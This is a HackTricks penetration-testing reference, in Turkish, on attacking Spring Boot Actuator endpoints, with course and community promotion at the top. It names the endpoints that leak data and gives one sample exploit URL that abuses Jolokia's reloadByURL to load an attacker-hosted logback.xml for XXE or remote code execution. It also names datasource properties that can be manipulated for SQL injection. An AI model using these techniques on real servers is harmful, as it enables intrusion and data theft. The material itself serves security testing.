<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmaya kadar öğrenin</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* Spring Boot Actuators, `/health`, `/trace`, `/beans`, `/env` gibi uç noktaları kaydeder. Sürümler 1'den 1.4'e kadar, bu uç noktalara kimlik doğrulama olmadan erişilebilir. Sürüm 1.5'ten itibaren yalnızca `/health` ve `/info` varsayılan olarak hassas olmayan uç noktalardır, ancak geliştiriciler genellikle bu güvenliği devre dışı bırakırlar.
* Belirli Actuator uç noktaları hassas verileri açığa çıkarabilir veya zararlı eylemlere izin verebilir:
*`/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart` ve `/heapdump`.
*`/jolokia` actuator uç noktası, HTTP erişimine izin veren Jolokia Kütüphanesini açığa çıkarır.
*`reloadByURL` eylemi, dış URL'den günlüğü yeniden yüklemek için sömürülebilir, bu da oluşturulmuş XML yapılandırmaları aracılığıyla kör XXE veya Uzaktan Kod Yürütme'ye yol açabilir.
* Örnek sömürü URL'si: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
*`spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url` ve `spring.datasource.tomcat.max-active` gibi özellikler, SQL enjeksiyonu veya veritabanı bağlantı dizelerinin değiştirilmesi gibi çeşitli sömürüler için manipüle edilebilir.